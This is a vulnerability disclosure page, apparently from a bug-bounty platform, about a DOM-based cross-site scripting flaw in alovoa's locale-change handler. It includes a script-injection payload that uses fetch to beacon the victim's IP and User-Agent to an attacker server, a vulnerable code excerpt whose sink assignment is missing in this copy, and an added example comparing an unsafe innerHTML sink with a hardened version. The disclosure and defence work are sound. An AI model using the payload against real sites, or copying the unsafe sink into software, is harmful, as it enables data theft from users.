Cross-site Scripting (XSS) - DOM in alovoa/alovoa


Reported on Jul 19th 2021

✍️ Description

It is possible to run JavaScript code in the webpage through unsanitized DOM properties. The function onChangeLocal sets the value of directly from the URL, without any prior check.

🕵️‍♂️ Proof of Concept

```javascript
// Vulnerable function in file fragments.html:139
function onChangeLocal(e) {
  // value taken straight from the selected option, which is URL-controlled
  let val = e.options[e.selectedIndex].value;
  console.log(val);
  /* the assignment target (the DOM sink) is missing from the page as extracted */ = val;
}
```

A quick example can be done by obtaining IP and User-Agent info from a victim: the attacker sets up a web server. For PoC purposes, a Pipedream URL was used:

The attacker also sends the following link to the victim: "><script>fetch("")</script>

So val will be set to the malicious payload.

When the victim opens the link, the attacker gets the IP and User-Agent.


💥 Impact

This could be useful for an attacker to make users execute a malicious link and then get personal information or do other malicious actions.
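The pattern behind this report, a locale-change handler whose URL-derived value reaches a DOM sink unchecked, shown next to a hardened version. This is an added example and not alovoa's code: the "lang" query parameter, the list of supported locales and the stub element standing in for the DOM are assumptions made so it runs under Node without a browser.

```javascript
// Added example (not code from the alovoa project): vulnerable and hardened
// forms of a locale-change handler, runnable under Node with a stub element.

// Constructed allow-list: the locales the application actually ships.
const SUPPORTED_LOCALES = new Set(["en", "de", "es", "fr", "it", "pt"]);

// Syntactic guard before the allow-list lookup: a two-letter language code,
// optionally with an upper-case region subtag (e.g. "pt-BR"). Quotes, angle
// brackets and slashes never pass this test.
const LOCALE_PATTERN = /^[a-z]{2}(-[A-Z]{2})?$/;

function isAllowedLocale(val) {
  return typeof val === "string" &&
    LOCALE_PATTERN.test(val) &&
    SUPPORTED_LOCALES.has(val.split("-")[0]);
}

// Read the locale from the URL. The "lang" parameter name is an assumption
// for this example; the report does not name the parameter it abused.
function localeFromUrl(href) {
  return new URL(href).searchParams.get("lang");
}

// Escaper for the case where a value really has to be interpolated into
// markup. With the text sink used below it is not needed; it shows the
// alternative defence when a text sink is not an option.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the attacker-controlled string reaches an HTML sink
// unchanged, so a payload of the kind in the report is rendered as markup.
function onChangeLocalUnsafe(val, el) {
  el.innerHTML = val;
  return el.innerHTML;
}

// Hardened pattern: anything outside the allow-list is replaced by the
// default locale, and the value is written through a text sink, which
// cannot create elements whatever the string contains.
function onChangeLocalSafe(val, el, fallback = "en") {
  const locale = isAllowedLocale(val) ? val : fallback;
  el.textContent = locale;
  return locale;
}

// Stub for a DOM element so both handlers run outside a browser.
function makeElement() {
  return { innerHTML: "", textContent: "" };
}

// Constructed URL carrying the same shape of payload the report shows.
const PAYLOAD_URL =
  "https://app.example.test/?lang=%22%3E%3Cscript%3Efetch(%22%22)%3C/script%3E";

// Runs both handlers on the payload and returns what each sink ended up with.
function demo(href = PAYLOAD_URL) {
  const val = localeFromUrl(href);
  const unsafeEl = makeElement();
  const safeEl = makeElement();
  return {
    extracted: val,
    unsafeSink: onChangeLocalUnsafe(val, unsafeEl),
    safeLocale: onChangeLocalSafe(val, safeEl),
    safeSinkHtml: safeEl.innerHTML,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The two controls are independent: the allow-list stops the payload from ever being accepted as a locale, and the text sink makes the write harmless even if validation were bypassed. A Content-Security-Policy without `unsafe-inline` would block the injected `fetch` beacon as a third layer, but that is a deployment setting rather than a code change.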


Ileana Barrionuevo modified the report
2 years ago
We have contacted a member of the alovoa team and are waiting to hear back 2 years ago
Nho Quy Dinh validated this vulnerability 2 years ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
Nho Quy Dinh marked this as fixed with commit 01ae69 2 years ago
Nho Quy Dinh has been awarded the fix bounty
This vulnerability will not receive a CVE
2 years ago

Dear Ileana Barrionuevo, I don't like to find bugs on repositories that someone is already working on, so if you let me, I will work on Alovoa. Your friend, Amammad.

2 years ago


Hi Amammad, I don't have any problem :) Four eyes see better than two ones. :D
